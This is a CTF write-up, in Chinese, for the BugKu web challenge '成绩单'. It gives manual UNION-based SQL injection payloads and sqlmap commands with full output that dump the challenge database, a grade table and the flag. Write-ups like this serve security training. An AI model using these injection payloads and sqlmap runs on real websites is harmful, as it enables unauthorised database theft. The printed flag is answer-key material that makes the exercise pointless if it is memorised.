BugKuCTF WEB 成绩单
http://123.206.87.240:8002/chengjidan/
题解:
版本一
输入0' union select database(),2,3,4 #
数据库名:skctf_flag
输入0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'#
数据库表名:fl4g
输入0' union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#
数据库列名:skctf_flag
输入0' union select skctf_flag,2,3,4 from fl4g#
flag:BUGKU{Sql_INJECT0N_4813drd8hz4}
版本二
工具:sqlmap
sqlmap检测sql注入
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"
结果
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests: --- Parameter: id (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1' AND SLEEP(5) AND 'fELh'='fELh Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP --- [11:01:58] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12
数据库:mysql
列举数据库
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs
结果
available databases [2]: [*] information_schema [*] skctf_flag
数据库:skctf_flag
列举数据库skctf_flag的表
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump
结果
Database: skctf_flag [2 tables] +------+ | fl4g | | sc | +------+
skctf_flag的数据表:
fl4g
sc
列举内容
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump
结果
Database: skctf_flag Table: sc [3 entries] +----+------+------+---------+---------+ | id | name | math | chinese | english | +----+------+------+---------+---------+ | 1 | 龙龙龙 | 60 | 70 | 60 | | 2 | 浩儿 | 70 | 74 | 84 | | 3 | 静静 | 80 | 90 | 85 | +----+------+------+---------+---------+ [11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv' [11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................ (done) [11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y 1 [11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) [11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times BUGKU [11:18:42] [ERROR] invalid character detected. retrying.. [11:18:42] [WARNING] increasing time delay to 3 seconds {Sq [11:20:01] [ERROR] invalid character detected. retrying.. [11:20:01] [WARNING] increasing time delay to 4 seconds l_INJE [11:21:48] [ERROR] invalid character detected. retrying.. [11:21:48] [WARNING] increasing time delay to 5 seconds CT0N_4 [11:24:01] [ERROR] invalid character detected. retrying.. [11:24:01] [WARNING] increasing time delay to 6 seconds 81 [11:24:54] [ERROR] invalid character detected. retrying.. [11:24:54] [WARNING] increasing time delay to 7 seconds 3dr [11:26:24] [ERROR] invalid character detected. retrying.. [11:26:24] [WARNING] increasing time delay to 8 seconds d [11:27:10] [ERROR] invalid character detected. retrying.. [11:27:10] [WARNING] increasing time delay to 9 seconds 8hz4} Database: skctf_flag Table: fl4g [1 entry] +---------------------------------+ | skctf_flag | +---------------------------------+ | BUGKU{Sql_INJECT0N_4813drd8hz4} | +---------------------------------+
flag:BUGKU{Sql_INJECT0N_4813drd8hz4}